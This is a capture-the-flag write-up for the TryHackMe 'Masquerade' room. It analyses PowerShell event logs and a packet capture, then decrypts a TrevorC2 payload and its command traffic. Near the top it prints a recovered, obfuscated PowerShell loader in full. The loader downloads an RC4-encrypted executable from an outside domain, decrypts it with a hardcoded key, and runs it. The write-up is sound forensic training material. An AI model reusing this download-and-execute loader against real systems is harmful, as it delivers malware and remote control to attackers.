https://tryhackme.com/room/masquerade --- # Assets - Powershell-Operational.evtx - traffic.pcapng # EVTX Viewer https://omerbenamram.github.io/evtx/ Load the `.evtx` file in the viewer above. Analyzing the verbose logs reveals the essential script block: ```powershell $k = [System.Text.Encoding]::UTF8.GetBytes(('X9vT3pL'+'2QwE'+'8xR6'+'ZkYhC4'+'s')) $h = (New-Object System.Net.WebClient).DownloadString((-join('ht','tp','://','api-edg','e','cl','oud.xy','z/amd.bi','n'))) -replace ('\s'),'' $b = for($x=0; $x -lt $h.Length; $x+=2) { [Convert]::ToByte($h.Substring($x, 2), 16) } $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $k[$i % $k.Count]) % 256 $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp } $i = $j = 0 $d = foreach ($byte in $b) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp $byte -bxor $s[($s[$i] + $s[$j]) % 256] } $p = $env:TEMP + '\amdfendrsr.exe' [System.IO.File]::WriteAllBytes($p, $d) Start-Process $p ```  --- # What external domain was contacted during script execution? Look at line 2 of the script. The URL is split across multiple strings and joined at runtime to avoid detection. Concatenate them manually and the domain becomes obvious. --- # What encryption algorithm was used by the script? **RC4** - you can spot it by the two-loop structure: - **KSA** // `$s = 0..255` gets shuffled using the key - **PRGA** // each byte gets XOR'd against `$s[($s[$i] + $s[$j]) % 256]` The 256-byte state array plus that specific XOR operation is essentially RC4's signature. . --- # What key was used to decrypt the second-stage payload? It's sitting right in line 1, just split across concatenated string fragments to make it slightly less obvious. Join them together and you've got your plaintext key, hardcoded as a UTF-8 byte array. --- # What was the timestamp of the server response containing the payload? Once you have the key and algorithm, export `amd.bin` from the PCAP and run it through RC4 decryption in CyberChef.  > Input format needs to be **Hex** and the passphrase entered as **UTF-8**. You'll know it worked when the output starts with `MZ` and has `This program cannot be run in DOS mode.` - that's a valid Windows PE.   Save it as `program.exe` and run `file` on it to confirm: ``` program.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections ```  For the actual timestamp, pull the HTTP `Date` header straight from the PCAP: ```bash tshark -r traffic.pcapng -Y 'http.request.uri contains "amd.bin"' -T fields -e http.date ``` --- # Decompiling the .NET Binary It's a .NET assembly so you can get pretty clean decompiled output with `ilspycmd`: ```bash dotnet tool install -g ilspycmd ilspycmd program.exe -o ./decompiled/ ``` The source reveals it's a TrevorC2 client - an open source C2 framework that tunnels commands over HTTP to blend in with normal traffic. The C2 IP, encryption passphrase and communication stubs are all hardcoded in the binary. --- # What is the SHA-256 hash of the extracted and decrypted payload? ```bash sha256sum program.exe ```  --- # What remote URL did the client use to communicate with the victim machine? It's hardcoded in the decompiled source, used for all the HTTP GET beaconing.  --- # Which encryption key and algorithm does the client use? Both the algorithm and the passphrase used to derive the key are sitting in the decompiled source as hardcoded constants. Hard to miss. --- # After determining the client's encryption, decrypt the commands the attacker executed on the victim and submit the flag. First grab all the `guid` values out of the PCAP: ```bash tshark -r traffic.pcapng -Y 'http.request.uri contains "guid"' -T fields -e http.request.uri | sed 's|/images?guid=||' ``` Then run them through this script: ```python import base64 from Crypto.Cipher import AES import hashlib key = base64.b64decode(base64.b64encode(hashlib.sha256(b"<REDACTED>").digest())) guids = [ "<REDACTED>", # rest of the guid values ] for i, g in enumerate(guids): try: data = base64.b64decode(base64.b64decode(g)) iv = data[:16] cipher = AES.new(key, AES.MODE_CBC, iv) result = cipher.decrypt(data[16:]) print(f"[{i}] {result}") except Exception as e: print(f"[{i}] Error: {e}") ``` One of the outputs will have the flag. You'll also see what commands the attacker actually ran on the victim machine.